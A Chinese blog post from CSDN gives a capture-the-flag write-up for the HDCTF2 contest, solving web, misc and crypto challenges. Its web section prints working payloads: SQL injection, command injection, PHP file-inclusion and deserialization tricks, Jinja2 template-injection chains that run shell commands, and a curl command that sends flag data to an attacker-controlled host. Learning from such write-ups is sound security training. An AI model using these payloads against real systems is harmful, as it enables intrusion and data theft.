HDCTF2 wp

最新推荐文章于 2023-08-30 22:44:33 发布
最新推荐文章于 2023-08-30 22:44:33 发布
阅读量1.2k 收藏 1
点赞数 2
分类专栏: ctf 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/109198802
版权

前段时间创建了海南大学举报的hdctf2。以校外的身份参加,最后获得了举办方提供的小礼品,非常感谢

web

by Firebasky

signin

查看源代码,base64解密

babysql

https://bbs.ichunqiu.com/thread-44483-1-1.html

查看字段

payload:1'order by 3%23

获得flag:1'union select 1,2,flag from flag%23

babyrce

payload:127.0.0.1|cat /flag

easy_git

https://www.cnblogs.com/Lmg66/p/13598803.html

使用GitHack 工具

python GitHack.py -u 8.129.15.153:20003/.git/

HDCTF{ACTF_.git_leak_is_dangerous}

注:可能一次不成功,可以多尝试几次

backup_file

/index.php.bak下载备份文件

弱类型比较

?key=123

easy_file_include

php://filter/read=convert.base64-encode/resource=flag.php

do_u_know_HTTP

根据提示进行添加
添加参数是

Mg:

erciyuan

这道题一点点坑,思路是进行文件包含,读取文件,必须知道加密格式,结果加密格式在返回包里面

Hint: !HDCTF!.php && bin2hex(base64_encode(gzdeflate($file)))

第二个坑是将!换成了HnuSec,读取源代码发现的

<?php
$a='HnuSecHDCTFHnuSec.php';
echo (bin2hex(base64_encode(gzdeflate($a))));
#383867724455354e396e4278446e487a41445031436a494b41413d3d

获得flag

hash_hmac

post:

x[]=1&y[]=2

welcome

登录成功就OK

用户名:admin

密码直接给你了

calculator_v1

因为没有对参数进行过滤可以执行命令

open("flag").read()

__import__('os').popen('cat flag').read()

ezflask

https://www.cnblogs.com/bmjoker/p/13508538.html

https://blog.csdn.net/a3320315/article/details/104102979?utm_source=app

{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("cat flag").read()') }} {% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}

dudaima

https://zhuanlan.zhihu.com/p/102166928?utm_source=qq

<?php
show_source(__FILE__);
error_reporting(0);
include "lib.php";
class Just4Fun {
    public $enter;
    public $secret;
}
if(isset($_GET["pass"])) {
    $o = unserialize($_GET["pass"]);
    
    $o->secret = bin2hex(random_bytes(256));
    
    if ($o->secret === $o->enter){
        echo FLAG;
    }else{
        die("secret or enter wrong!");
    }
}else{
    die("no pass");
} 
#代码非常简单,就是让Just4Fun类里面的属性值相同就获得flag
#但是secret的值我们不知道,但是我们知道他的地址不会改变。

payload:

<?php
error_reporting(0);
class Just4Fun {
    public $enter;
    public $secret;
}
$a =new Just4Fun();
$a->enter=&$a->secret;//这里的a=&b 即代表将b的指针赋值给a 无论b的值怎么变 a始终等于b
echo serialize($a);
#O:8:"Just4Fun":2:{s:5:"enter";N;s:6:"secret";R:2;}

getshell

<?php
$str = $_POST['str'];

if(isset($str)){
    $sp = ",";
    $kv = "=";

    $arr = str_replace(array($kv,$sp),array('"=>"','","'),'array("'.$str.'")');
    
    eval("\$arr"." = $arr;");

}else{
    show_source(__FILE__);
}

通过闭合前面和注释后面绕过

payload:");system('cat flag.php');//

warmup

和wecome一样的

welcome_to_the_new

简单的反序列化

#payload
<?php
error_reporting(0);
Class Stu{
    private $name;
    private $age;
    private $sex;
    public $info = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
$someone = new Stu('M&G', 20, 'Man');
echo urlencode(serialize($someone));

calculator_v2

open('flag').__class__.__dict__['re'+'ad'](open('flag'))

simple_trick

https://blog.csdn.net/moliyiran/article/details/81172325

<?php 
highlight_file(__FILE__); 
include('flag.php'); 
$a = $_GET['a']; 
$b = unserialize ($a); 
$b->c = $flag; 
foreach($b as $key => $value) 
{ 
        if($key==='c') 
        { 
                continue; 
        } 
        echo $value; 
} 
?>

#payload
#m3w师傅
<?php
$a=new stdClass();
//借用内置类声明对象
$a->b=&$a->c;
//将c的地址附给b
// print_r($a);
echo serialize($a);
?>

welcome_to_the_new2

在welcome_to_the_new1的基础上添加了php字符串解析漏洞

https://www.freebuf.com/articles/web/213359.html

#payload
<?php
error_reporting(0);
Class Stu{
    private $name;
    private $age;
    private $sex;
    public $info = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
$someone = new Stu('M&G', 20, 'Man');
echo urlencode(serialize($someone));
#O%3A3%3A%22Stu%22%3A4%3A%7Bs%3A9%3A%22%00Stu%00name%22%3BN%3Bs%3A8%3A%22%00Stu%00age%22%3BN%3Bs%3A8%3A%22%00Stu%00sex%22%3BN%3Bs%3A4%3A%22info%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D

传递的参数和值是

Hai[nan.University=O%3A3%3A%22Stu%22%3A4%3A%7Bs%3A9%3A%22%00Stu%00name%22%3BN%3Bs%3A8%3A%22%00Stu%00age%22%3BN%3Bs%3A8%3A%22%00Stu%00sex%22%3BN%3Bs%3A4%3A%22info%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D

calculator_v3

#m3w师傅的payload
http://8.129.15.153:20020/?question=exec("__import__('o'%2b's').po"%2b"pen('curl -d `find / -name \"flag*\"|base64 -w 0` ip:端口').re"%2b"ad()")
先用这个payload带回flag的位置

http://8.129.15.153:20020/?question=exec("__import__('o'%2b's').po"%2b"pen('curl -d `cat /usr/src/app/flag|base64 -w 0` ip:端口').re"%2b"ad()")
再用这个带回flag

ezflask

{{"".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['po'+'pen']("cat fl""ag").read()}}

misc

签到题

直接上flag

一步之遥

zip伪加密,修改最后数据01===》00

你知道lsb是什么意思吗

利用zsteg查看照片,发现存在zip,和flag

zsteg -E "b1,rgb,lsb,xy" 1.png > flag.zip

利用crc暴力破解

girlfriend

通过Wireshark打开,从http分离照片获得flag

嘤语

将嘤换成-去解密

你真的了解dns吗

考察 dns的txt解析

payload:nslookup -qt=txt hdctf.0x00.work

密码

起源

凯撒密码加密

围住世界

相当于栅栏密码的变性,需要自己推

3 6 6 6 3

有趣起来了

考察埃特巴什码

Firebasky
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
HZNUCTF-ezflask
qq_44640313的博客
03-27 560
jinja2的注入
DASCTF 2023 & 0X401七月暑期挑战赛 web题 EzFlask
m0_63138919的博客
08-30 240
1
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
Jay17的博客
08-05 1362
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
SSTI Flask做题记录1
Firebasky的博客
10-12 998
这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下 1. ezflask hdctfezflask地址 这个题比较简单,直接一层一层的去找一找利用的类和函数就可以啦 记录一下自己的步骤: 1.{{''.__class__}} # 获得单引号的类型 2.{{''.__class__.__base__}} #获得object 3.{{''.__class__.__base__.__subclasses__()}}#获得基类 4.{{''.__class__.__.
wp2pcs百度网盘
01-10
wP2PCS把你的WordPress和百度个人云存储(百度网盘)联系在一起,将百度网盘作为你的网站后备箱,你可以将WordPress备份到百度云,可以把图片放在百度云,可以利用百度云为你的网站提供下载,利用云存储随时随地同步...
wp2 密码包
01-09
wp2 密码包
WP2-ctfshow
最新发布
02-24
2
wp2
03-27
【标题】"wp2"可能指的是WordPress的二次开发或者一个特定的WordPress主题或插件,因为"wp"通常是WordPress的缩写。在这个上下文中,它可能是关于如何利用PHP语言进行WordPress定制的一个知识点。 【描述】虽然提供...
wp开发工具2
01-04
WP用户登录界面开发,在移动端可以帮助用户剩下开发时间,提升开发效率!
buuctf--easyflask
qq_46263951的博客
01-04 874
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
gzinflate java_PHP base64+gzinflate压缩编码和解码代码
weixin_34929072的博客
02-15 244
base64+gzinflate压缩编码(加密)过的文件通常是以 eval(gzinflate(base64_decode( 为头的一个php文件。以下我们给出了相关的编码解码(加密解密)代码。压缩编码(加密)代码:function encode_file_contents($filename) {$type=strtolower(substr(strrchr($filename,'.'),1)...
HDCTF2023 WP
m0_68757308的博客
04-23 1151
HDCTF2023 WP
HZNUCTF2023 web
weixin_63231007的博客
05-07 1366
HZNUCTF校赛 赛后复现
HSCSEC 2023 个人练习
weixin_44770698的博客
02-19 715
HSCSEC 2023 练习
GACTF2020 simpleflask& EZFLASK
汗的博客
09-03 1363
信息收集 直接访问,提示方法不允许 使用burpsuite,右键-change request method 提示了个name,猜测是参数 因为题目是flask,容易想到ssti,直接试name={{2*2}} 再试,因为可能是有过滤、waf之类的name={{2-2}},可以看到2-2有了结果 可以确定是存在ssti的,接下来就是具体的bypass和get flag了 bypass&利用 用burp进行一次fuzz,还做不到颅内ctf,以下是一个简单的fuzz字符list [ ] ( \
DASCTF 2023 & 0X401七月暑期挑战赛web复现
weixin_63231007的博客
08-02 1067
python原型链污染&xpath注入&pearcmd文件包含&django框架
Flask(四)
qq_60381063的博客
09-11 245
2,session:session和cookie的作用有点类似,都是为了存储用户相关的信息,不同的是,cookie是存储在本地浏览器,session是一个思路、一个概念、一个服务器存储授权信息的解决方案,不同的服务器,不同的框架,不同的语言有不同的实现,虽然实现不同,但是他们的目的都是服务器为了方便存储数据的,session的出现,是为了解决cookie存储数据不安全的问题。wtforms表单的两个主要功能是验证用户提交数据的合法性以及渲染模板,当然还包括一些其他功能:CSRF保护、文件上传等。
NUAACTF - Web - Ez_Flask
1tachi的博客
12-27 593
按照提示随便传一个:?name=123 可能存在模板渲染,检测一下:?name=${2*7} ?name={{7*7}} ?name={{7*'7'}} 发现是 jinja2 渲染 看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}} 可以一点一点的往下找,也可以直接写payload {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ ==.
E2PROM的WP是什么意思
09-06
E2PROM的WP是写保护位(Write Protect)的缩写。他是一个控制引脚,通常用于保护E2PROM的写入操作免受不希望的修改。当WP引脚被拉低时,E2PROM的写入操作会被禁用,从而防止对存储的数据进行修改。通过使用写保护位...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值